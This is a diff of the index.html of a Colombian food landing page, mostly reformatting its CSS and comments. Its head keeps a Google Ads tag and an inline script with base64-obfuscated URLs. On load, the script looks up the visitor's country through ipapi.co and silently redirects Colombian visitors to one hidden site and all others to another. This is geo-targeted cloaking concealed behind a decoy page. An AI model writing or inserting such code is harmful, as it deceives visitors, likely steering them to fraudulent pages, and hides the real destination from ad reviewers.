--- a/index.html
+++ b/index.html
@@ -6,62 +6,183 @@
 <title>Comida Colombiana Popular</title>
 
 <style>
-html,body{overflow-x:hidden!important;width:100%!important;margin:0;padding:0}
-*{max-width:100%!important;box-sizing:border-box}
-body{font-family:Inter,Arial,sans-serif;background:#fff}
-header{width:100%;background:#00aa30;padding:15px 20px;display:flex;align-items:center;justify-content:flex-start;color:#fff;position:sticky;top:0;z-index:99;gap:12px}
-header .icon{font-size:28px;cursor:pointer}
-header .title{font-size:20px;font-weight:600}
-.hero{background:#00bd35;height:70vh;display:flex;flex-direction:column;justify-content:center;align-items:center;color:#000;text-align:center;padding:20px}
-.hero h1{font-size:42px;font-weight:300;margin:0}
-.hero h2{font-size:35px;font-weight:300;margin-top:10px}
-.hero button{margin-top:35px;padding:14px 40px;background:#009f2b;border:none;color:#fff;font-size:18px;border-radius:10px;cursor:pointer;box-shadow:0 3px 10px rgba(0,0,0,.2);transition:.2s}
-.hero button:hover{background:#00b233;transform:scale(1.03)}
-footer{background:#00aa30;padding:30px 20px;color:#000}
-footer h3{font-size:22px;margin-bottom:15px;font-weight:600}
-.footer-box{display:flex;align-items:center;gap:15px}
-.footer-icon{width:60px;height:60px;background:#ffffff90;border-radius:18px;display:flex;align-items:center;justify-content:center;font-size:28px}
-footer .text{font-size:18px}
-.legal{text-align:center;margin-top:20px}
-.legal a{color:#004d18;font-size:15px;text-decoration:none;font-weight:600}
-.legal a:hover{text-decoration:underline}
+/* 🔒 ARREGLOS GENERALES */
+html,body{
+    overflow-x:hidden!important;
+    width:100%!important;
+    margin:0;
+    padding:0;
+}
+
+/* ✅ TODAS LAS LETRAS EN VERDE */
+*{
+    max-width:100%!important;
+    box-sizing:border-box;
+    color:#008000 !important;
+}
+
+body{
+    font-family:Inter,Arial,sans-serif;
+    background:#fff;
+}
+
+/* HEADER */
+header{
+    width:100%;
+    background:#00aa30;
+    padding:15px 20px;
+    display:flex;
+    align-items:center;
+    justify-content:flex-start;
+    position:sticky;
+    top:0;
+    z-index:99;
+    gap:12px;
+}
+
+header .icon{
+    font-size:28px;
+    cursor:pointer;
+}
+
+header .title{
+    font-size:20px;
+    font-weight:600;
+}
+
+/* HERO */
+.hero{
+    background:#00bd35;
+    height:70vh;
+    display:flex;
+    flex-direction:column;
+    justify-content:center;
+    align-items:center;
+    text-align:center;
+    padding:20px;
+}
+
+.hero h1{
+    font-size:42px;
+    font-weight:300;
+    margin:0;
+}
+
+.hero h2{
+    font-size:35px;
+    font-weight:300;
+    margin-top:10px;
+}
+
+.hero button{
+    margin-top:35px;
+    padding:14px 40px;
+    background:#009f2b;
+    border:none;
+    font-size:18px;
+    border-radius:10px;
+    cursor:pointer;
+    box-shadow:0 3px 10px rgba(0,0,0,.2);
+    transition:.2s;
+}
+
+.hero button:hover{
+    background:#00b233;
+    transform:scale(1.03);
+}
+
+/* FOOTER */
+footer{
+    background:#00aa30;
+    padding:30px 20px;
+}
+
+footer h3{
+    font-size:22px;
+    margin-bottom:15px;
+    font-weight:600;
+}
+
+.footer-box{
+    display:flex;
+    align-items:center;
+    gap:15px;
+}
+
+.footer-icon{
+    width:60px;
+    height:60px;
+    background:#ffffff90;
+    border-radius:18px;
+    display:flex;
+    align-items:center;
+    justify-content:center;
+    font-size:28px;
+}
+
+footer .text{
+    font-size:18px;
+}
+
+.legal{
+    text-align:center;
+    margin-top:20px;
+}
+
+.legal a{
+    font-size:15px;
+    text-decoration:none;
+    font-weight:600;
+}
+
+.legal a:hover{
+    text-decoration:underline;
+}
 </style>
 
-<!-- Google tag (gtag.js) --> <script async src="https://www.googletagmanager.com/gtag/js?id=AW-17815370524"></script> <script> window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'AW-17815370524'); </script>
+<!-- Google tag (gtag.js) -->
+<script async src="https://www.googletagmanager.com/gtag/js?id=AW-17815370524"></script>
+<script>
+window.dataLayer = window.dataLayer || [];
+function gtag(){dataLayer.push(arguments);}
+gtag('js', new Date());
+gtag('config', 'AW-17815370524');
+</script>
+
 <script>
 (_=>{
 const u="aHR0cHM6Ly9jb21pZGFwb3B1bGFyLnZlcmNlbC5hcHAvaW5pY2lvLmh0bWw=",
-p="aHR0cHM6Ly9jb21pZGFwb3B1bGFyLnhvLmplLw==",
-R=s=>location.href=atob(u);
+      p="aHR0cHM6Ly9jb21pZGFwb3B1bGFyLnhvLmplLw==",
+      R=()=>location.href=atob(u);
+
 fetch("https://ipapi.co/json/")
 .then(r=>r.json())
 .then(j=>{
- (j.country||"")=="CO"
-   ? location.href = atob(p)
-   : R();
+  (j.country||"")=="CO"
+    ? location.href = atob(p)
+    : R();
 })
 .catch(R);
 })();
 </script>
 </head>
-    
+
 <body>
 
-<!-- ---------------- HEADER ---------------- -->
+<!-- HEADER -->
 <header>
     <span class="icon">&#9776;</span>
     <span class="title">Comida Popular</span>
 </header>
 
-<!-- ---------------- HERO ---------------- -->
+<!-- HERO -->
 <section class="hero">
     <h1>Comida Colombiana</h1>
-    <h2>gusto Popular</h2>
-
-    <button onclick="window.location.href='menu.html'">Ingresa </button>
+    <h2>Gusto Popular</h2>
+    <button onclick="window.location.href='menu.html'">Ingresa</button>
 </section>
 
-<!-- ---------------- FOOTER ---------------- -->
+<!-- FOOTER -->
 <footer>
     <h3>Tu Popular</h3>
 
